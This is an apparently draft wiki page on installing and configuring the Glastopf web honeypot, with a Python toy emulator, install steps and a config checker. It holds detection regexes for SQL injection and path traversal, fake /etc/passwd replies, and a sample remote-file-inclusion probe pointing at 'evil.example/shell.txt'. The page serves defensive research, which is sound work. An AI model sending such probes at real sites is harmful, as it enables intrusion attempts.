Glastopf

From aldeid
DRAFT
This page is still a draft. Thank you for your understanding.

Description

Glastopf is a low-interaction web application honeypot capable of emulating thousands of vulnerabilities to gather data from attacks that target web applications. The principle behind it is very simple: reply to the attack with the response the attacker expects from a successful exploitation attempt, so that the attacker (usually an automated tool) keeps going and the honeypot can collect the full request, the injected payloads and any files they refer to.

+--------------------------+
|        Attack event      |
+-------------+------------+
              |
              V
+--------------------------+
|  Vulnerability emulator  |
+-------------+------------+
              |
              V
+--------------------------+
|      Collect data        |
+-------------+------------+
              |
      +-------+-----+
      |             |
      V             V
+----------+ +-------------+
| Database | | store files |
+-----+----+ +------+------+
      |             |
      +-------+-----+
              |
              V
+--------------------------+
|     Reply to attacker    |
+--------------------------+

For more information, refer to the Honeynet Project's technical paper on Glastopf: http://honeynet.org/files/KYT-Glastopf-Final_v1.pdf.
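The loop in the diagram above, as an added example in Python that is not Glastopf's own code: three toy emulators (remote file inclusion, path traversal, error-based SQL injection) classify an incoming request, the event is written to an SQLite store standing in for the database box, and the reply is the one the probe is looking for. The matching rules, the reply templates, the sample source addresses and the `http://evil.example/shell.txt` URL are illustrative assumptions, not Glastopf's signatures.

```python
"""Minimal low-interaction web honeypot illustrating the loop
attack event -> vulnerability emulator -> collect data -> reply to attacker.
Added example for this page, not Glastopf's own code.  The emulator rules,
the reply templates and the sample probes are illustrative assumptions."""
import json
import re
import sqlite3
from datetime import datetime, timezone
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlsplit

# Constructed in-memory store standing in for Glastopf's event database.
DB = sqlite3.connect(":memory:", check_same_thread=False)
DB.execute("CREATE TABLE events (ts TEXT, src TEXT, path TEXT, emulator TEXT, detail TEXT)")

# Fake file content handed to traversal probes (constructed, not a real system file).
FAKE_PASSWD = ("root:x:0:0:root:/root:/bin/bash\n"
               "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n")


def emulate_rfi(path, params):
    """Remote file inclusion probe: a parameter whose value is an absolute URL."""
    for key, values in params.items():
        for v in values:
            if re.match(r"^(https?|ftp)://", v, re.I):
                # The attacker expects the included script to run; answer as if it did.
                return {"param": key, "url": v}, 200, "<html><body>ok</body></html>"
    return None


def emulate_traversal(path, params):
    """Path traversal probe: '../' (raw or URL-encoded) in the path or a parameter."""
    candidates = [path] + [v for vs in params.values() for v in vs]
    if any("../" in c or "..%2f" in c.lower() for c in candidates):
        # Most traversal probes ask for /etc/passwd; hand back a fake one.
        return {"target": path}, 200, FAKE_PASSWD
    return None


def emulate_sqli(path, params):
    """Error-based SQL injection probe: quote followed by boolean or UNION logic."""
    for key, values in params.items():
        for v in values:
            if re.search(r"('|%27)\s*(or|and)\b|\bunion\s+(all\s+)?select\b", v, re.I):
                # A database error message is exactly what an error-based probe wants to see.
                return {"param": key}, 500, "You have an error in your SQL syntax"
    return None


# Ordered most to least specific: the first emulator that matches answers the request.
EMULATORS = [("rfi", emulate_rfi), ("traversal", emulate_traversal), ("sqli", emulate_sqli)]


def handle(request_target, src_ip):
    """Run one request target through the emulators, record the event,
    and return (status, body, emulator name)."""
    parts = urlsplit(request_target)
    params = parse_qs(parts.query, keep_blank_values=True)
    for name, emulator in EMULATORS:
        hit = emulator(parts.path, params)
        if hit:
            detail, status, body = hit
            break
    else:
        # Nothing matched: behave like a plain web server so the probe moves on.
        name, detail = "none", {}
        status, body = ((200, "<html><body>Welcome</body></html>")
                        if parts.path == "/" else (404, "Not Found"))
    DB.execute("INSERT INTO events VALUES (?,?,?,?,?)",
               (datetime.now(timezone.utc).isoformat(), src_ip,
                request_target, name, json.dumps(detail)))
    DB.commit()
    return status, body, name


def events():
    """Collected events as (src, path, emulator, detail) tuples, oldest first."""
    return DB.execute("SELECT src, path, emulator, detail FROM events ORDER BY rowid").fetchall()


class Handler(BaseHTTPRequestHandler):
    """Thin HTTP front end so the loop can be exercised with a browser or curl."""

    def do_GET(self):
        status, body, _ = handle(self.path, self.client_address[0])
        data = body.encode()
        self.send_response(status)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)


if __name__ == "__main__":
    # Unprivileged port for a local test; a real deployment binds port 80.
    HTTPServer(("127.0.0.1", 8080), Handler).serve_forever()
```

Run it and `curl 'http://127.0.0.1:8080/index.php?page=http://evil.example/shell.txt'` is recorded as an rfi event. The emulators answer the first match only, so order them from most to least specific. Glastopf itself goes further for RFI: rather than faking the reply, it fetches the injected file and runs it in the PHP sandbox built later on this page, which is why the sandbox is part of the installation.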

Installation

Prerequisites

Packages

$ sudo apt-get install git subversion python2.7 python-openssl python2.7-dev \
   build-essential make

To run the PHP sandbox, you will also need these packages:

$ sudo apt-get install php5-cli php5-dev php5-cgi subversion

evnet module

First you need to install the libev dependency (make install places it under /usr/local/lib, so refresh the linker cache afterwards or the evnet build will not find it):

$ wget http://dist.schmorp.de/libev/libev-4.18.tar.gz
$ tar xzf libev-4.18.tar.gz
$ cd libev-4.18/
$ ./configure
$ make
$ sudo make install
$ sudo ldconfig

You should now be able to install evnet:

$ git clone git://github.com/rep/evnet.git
$ cd evnet/
$ sudo python2.7 setup.py install

pyev

$ mkdir -p ~/src/ && cd ~/src/
$ svn checkout http://pyev.googlecode.com/svn/trunk/ pyev
$ cd pyev/pyev/
$ sudo python2.7 setup.py install

Installing the PHP sandbox

$ cd ~/src/
$ svn co http://svn.php.net/repository/pecl/apd/trunk apd
$ cd apd/
$ phpize
$ ./configure
$ make
$ sudo make install

At the end of your php.ini file (/etc/php5/cli/php.ini), add these lines. The extension directory (20090626+lfs below) depends on your PHP build; `php-config --extension-dir` prints the correct one for your system:

zend_extension = /usr/lib/php5/20090626+lfs/apd.so
apd.dumpdir = /tmp/apd
apd.statement_tracing = 0

Test that the extension is loaded with the following command. Note that on Debian/Ubuntu each SAPI has its own php.ini: php5-cgi reads /etc/php5/cgi/php.ini, so the same three lines must be present there as well, while `php --version` tests the CLI configuration edited above:

$ php5-cgi --version
PHP 5.3.6-13ubuntu3.6 with Suhosin-Patch (cgi-fcgi) (built: Feb 11 2012 02:08:18)
Copyright (c) 1997-2011 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2011 Zend Technologies
    with Advanced PHP Debugger (APD) v1.0.2-dev, , by George Schlossnagle

Install Glastopf and apd_sandbox.php

Now it's time to build apd_sandbox.php. To do that, check out Glastopf and run make in its sandbox directory:

$ cd /opt/
$ sudo svn co svn://glastopf.org:9090/glaspot glaspot
$ cd glaspot/trunk/sandbox/
$ sudo make

Configuration

The minimal configuration is to set the IP address and port Glastopf listens on. Open the configuration file:

$ sudo vim /opt/glaspot/trunk/glastopf.cfg

And adapt it to your environment. `host` is the address of the interface the honeypot listens on (the value below is a placeholder, not a valid address). Port 80 is privileged, which is why webserver.py is started with sudo further down. Leave `[hpfeed]` disabled unless you have an account on an hpfeeds broker; `secret` is a shared credential, so keep the file readable by root only.

[webserver]
host = 88.191.123.456
port = 80

[hpfeed]
enabled = False
host = 
port = 10000
secret = 
# channels comma separated
chan = glastopf.events,glastopf.files
ident =
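A sanity check for the two sections above, as an added example that is not part of Glastopf: it parses a glastopf.cfg body with configparser, rejects a `host` that is not an IP address (the placeholder above is one), flags a privileged port, and, when hpfeed is enabled, insists that host, secret and ident are filled in and that at least one channel is listed. The sample configuration is constructed from the page.

```python
"""Sanity check for the [webserver] and [hpfeed] sections of glastopf.cfg.
Added example for this page, not Glastopf's own tooling; the checks are the
ones the minimal configuration on the page makes relevant."""
import configparser
import ipaddress

# Constructed sample: the page's minimal glastopf.cfg, placeholder address included.
SAMPLE_CFG = """\
[webserver]
host = 88.191.123.456
port = 80

[hpfeed]
enabled = False
host =
port = 10000
secret =
# channels comma separated
chan = glastopf.events,glastopf.files
ident =
"""


def _port_ok(port):
    return 0 < port < 65536


def check_config(text):
    """Return {'errors': [...], 'warnings': [...]} for a glastopf.cfg body.
    Errors stop the honeypot from working as intended; warnings need a decision."""
    cfg = configparser.ConfigParser()
    cfg.read_string(text)
    errors, warnings = [], []

    if not cfg.has_section("webserver"):
        errors.append("missing [webserver] section")
    else:
        ws = cfg["webserver"]
        host = ws.get("host", fallback="").strip()
        try:
            ipaddress.ip_address(host)
        except ValueError:
            errors.append(f"webserver.host {host!r} is not a valid IP address")
        port = ws.getint("port", fallback=-1)
        if not _port_ok(port):
            errors.append(f"webserver.port {port} is out of range")
        elif port < 1024:
            warnings.append(f"webserver.port {port} is privileged; webserver.py must be started as root")

    if cfg.has_section("hpfeed") and cfg["hpfeed"].getboolean("enabled", fallback=False):
        hp = cfg["hpfeed"]
        # With publishing enabled, every connection parameter must be present.
        for key in ("host", "secret", "ident"):
            if not hp.get(key, fallback="").strip():
                errors.append(f"hpfeed.{key} must be set when hpfeed is enabled")
        port = hp.getint("port", fallback=-1)
        if not _port_ok(port):
            errors.append(f"hpfeed.port {port} is out of range")
        chans = [c.strip() for c in hp.get("chan", fallback="").split(",") if c.strip()]
        if not chans:
            errors.append("hpfeed.chan lists no channels")

    return {"errors": errors, "warnings": warnings}


if __name__ == "__main__":
    import sys
    # Check a real file when a path is given, otherwise the constructed sample.
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_CFG
    report = check_config(text)
    for level in ("errors", "warnings"):
        for msg in report[level]:
            print(f"{level[:-1]}: {msg}")
    sys.exit(1 if report["errors"] else 0)
```

Run it as `python3 check.py /opt/glaspot/trunk/glastopf.cfg` before starting the honeypot; on the page's sample it reports the placeholder address as an error and the privileged port as a warning.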

Usage

Start and test the honeypot

Now that everything is configured, it's time to start and test the honeypot. It binds a privileged port (hence sudo) and exists to receive hostile input, including PHP that the sandbox executes, so run it on a dedicated, isolated host rather than on a machine that holds anything of value. Start it with the following commands:

$ cd /opt/glaspot/trunk/
$ sudo python webserver.py

Reporting

INCOMPLETE SECTION OR ARTICLE
This section/article is being written and is therefore not complete.
Thank you for your understanding.